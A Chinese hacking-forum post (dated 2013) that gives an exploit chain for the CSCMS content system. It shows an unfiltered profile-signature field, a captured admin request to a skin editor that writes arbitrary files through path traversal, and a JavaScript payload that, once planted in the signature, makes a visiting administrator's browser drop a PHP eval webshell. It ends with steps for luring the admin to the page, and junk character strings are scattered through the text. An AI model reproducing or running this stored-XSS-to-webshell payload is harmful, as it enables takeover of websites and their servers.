|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
! F4 q$ h* I y6 Y5 g官网已经修补了,所以重新下了源码
- B! N' |5 c0 L0 P' m因为 后台登入 还需要认证码 所以 注入就没看了。7 b5 d5 }( n& S# ?0 e5 y1 D. | ~( R
存在 xss/ R! _+ v4 R- b/ {! s1 w
漏洞文件 user/member/skin_edit.php' H, ~) j! r4 G1 D$ {1 z, d
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:0 \+ X( i; K9 B, p& d
7 \" q) F3 ^! P- j- P, |
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>8 _ ]2 W/ L( @, d3 p3 f$ e
9 i t) }, P( W& p5 V</textarea></td></tr># o' o; x* X" w- n% ^$ `6 y
H8 O4 C4 W; p# Z+ [ user/do.php
& s$ P( E- o7 \9 ?
; L/ p, m( k- U1 ]$ `) J# Q
8 V6 z" \; k7 D5 u$ N {if($op=='zl'){ //资料
1 P+ B! Q' _ O' e1 K
1 @$ B+ H) `% n& s5 ? if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
6 C4 h' x6 k: p/ p! q! x3 N* n exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
z; J2 ^0 b J
+ V5 @) |# A) G+ D $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',( o8 N5 G4 }1 R+ ?4 B( U
: |. s k/ M( M0 S CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."') p* y; A, y7 E2 H
where CS_Name='".$cscms_name."'";2 d$ ]# P8 s- X1 J- A; \
2 X; r, |9 D- W6 M6 c# k- X if($db->query($sql)){
; O8 f: z% C% a% n& {8 j
5 V! {- O( {; k, ]' I6 S5 x+ \" n exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));$ i/ N$ b* d5 N+ x) p2 m# p. p8 L
, v, I5 b. a. o7 _3 w* M. W }else{
- S6 c$ K# `# ?$ m( e 5 a; _! N1 x" ^5 Y3 _/ C: I) Z
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));4 f k9 k6 x0 S, G) Z
5 V# [% S1 ~4 x- | }
9 F. m6 N# g# S$ o3 j! ]% ^! k1 N& o5 o
+ Z0 U1 L* C' ]) Q' e没有 过滤导致xss产生。
+ b: \" ]& ?4 Z. X6 S9 o: V5 h% B后台 看了下 很奇葩的是可以写任意格式文件。。
5 _/ b- I- [( [8 y& i8 b抓包。。
; P" g- T7 }+ S, W# z5 H. A
. v6 ~" |# S; ?5 T" V: o( X/ ^# d& P
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.14 S1 ]$ p, }( C( B$ `/ a
! ~! s1 c; L, H L
Accept: text/html, application/xhtml+xml, */*
) E! Y) h9 {" y: Y3 g2 h! @ ( R1 K" {# A5 T9 \+ l
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
* e' G- b a9 E) E b, Z# W 9 H# d X b. F( p
Accept-Language: zh-CN
0 F1 X9 Q. M, z8 k6 v# j: X! l % c7 i1 n& q8 u% B
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
6 v. i" m3 _5 Q8 T% ~" I 0 Q! Y& Z: p. N8 \, g
Content-Type: application/x-www-form-urlencoded
: X1 d8 b& J- b6 g8 A2 \# w
; E- k3 I$ G. u' l+ u) t& X# TAccept-Encoding: gzip, deflate( L {; R- h9 g, Y7 v$ Q) Z! R
' m$ V7 T, f0 E3 v" ]/ @" lHost: 127.0.0.1# a" T2 \; V/ B. r" y
8 ^7 B8 z1 H N2 Z% f
Content-Length: 38+ g, P+ _3 X% v* n- r
: g; b0 \$ t8 _8 L& ODNT: 1
) M2 e6 k7 }1 T7 k! O 2 y1 I6 _0 I! @
Connection: Keep-Alive
6 m1 i! Q. U! E1 J. v" y' L 0 }5 W% _. y! W: Y+ j
Cache-Control: no-cache
9 f4 `6 k. L+ Q3 r5 z, `! o ! ]: {0 A( ^, b- M- ~$ N% y
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
) i2 g: D$ X6 H( P2 \+ [
2 f* h$ `6 Y+ E7 _( D/ w9 c& @' r3 l [
name=aaa.php&content=%3Cs%3E%3Ca%25%3E1 J: |, G( x: ]. C2 h1 H
* t) e Z! T+ b: q0 p3 |" }+ b* A
7 I d6 s: `; q9 \! W. a, {1 T
6 L% n; @- @' f# q& u! g
于是 构造js如下。
4 W2 g3 @* m% d( Q& J/ S
. L A% W$ h+ q' K2 S1 Y f0 ?; B本帖隐藏的内容<script>
2 h) b% K; ^. W' OthisTHost = top.location.hostname;
: K4 b* @9 b/ ~5 s/ _& l7 X/ N ' @9 T9 e1 k8 H* I8 _0 w
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
5 \ @0 M+ B5 J# W0 i0 M1 _3 [# V 4 `1 a% K* a2 q/ f
function PostSubmit(url, data, msg) {
5 r6 c# r( |) z, S0 L( T var postUrl = url;
0 h& I* W; l3 n9 h8 s
5 v6 E3 @4 `9 ?' S7 N var postData = data; ; C! \' h& j! a3 {
var msgData = msg;
% T5 @+ H. K5 S Y. u) R3 @$ z var ExportForm = document.createElement("FORM");
* p/ E4 q- N1 v% ~ document.body.appendChild(ExportForm); - f! Y/ o5 y; r& C1 U
ExportForm.method = "POST"; / Y! K2 k6 F9 R7 P/ l/ k/ d Q
var newElement = document.createElement("input");
% Y( k3 C6 x0 X/ E9 Q. X newElement.setAttribute("name", "name");
: \4 H1 z# i! s8 f' G9 K% P newElement.setAttribute("type", "hidden"); " G" i: Z' j: s' k: }- r
var newElement2 = document.createElement("input"); / c: v! R: ^8 o) T' G" W
newElement2.setAttribute("name", "content");
# c& d, q1 z( K- p3 ~* }% { newElement2.setAttribute("type", "hidden"); 8 d6 c' q; G% d! j
ExportForm.appendChild(newElement);
0 A4 h' {' O d8 s ExportForm.appendChild(newElement2);
' [% y; M& h7 I5 [ newElement.value = postData;
* s, H2 @) y& N! W+ w- @ newElement2.value = msgData;
# x! a( L0 s7 O ExportForm.action = postUrl;
. d a" q e2 M8 n4 Q( ] ExportForm.submit();
# J- s9 N4 h7 u) ^! O9 u/ }};
; c4 ]+ X0 V j |. R1 h
& K7 P2 p c+ nPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>"); V+ H- h0 ^5 L6 n- Y( j
, Z9 }+ P, q8 i0 l; Y6 J3 F</script>, i& ?# x( ^4 K8 v9 k
* k) f5 i% i) x* f/ ?6 p# f
- x# m+ m3 e: P# A1 g( S
+ |. O( o0 L1 V' s G2 I) ?# bhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
) p! k- {# Y A1 Y用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
6 S1 e3 H) C9 z# p就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
( D% B& f- K+ T
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对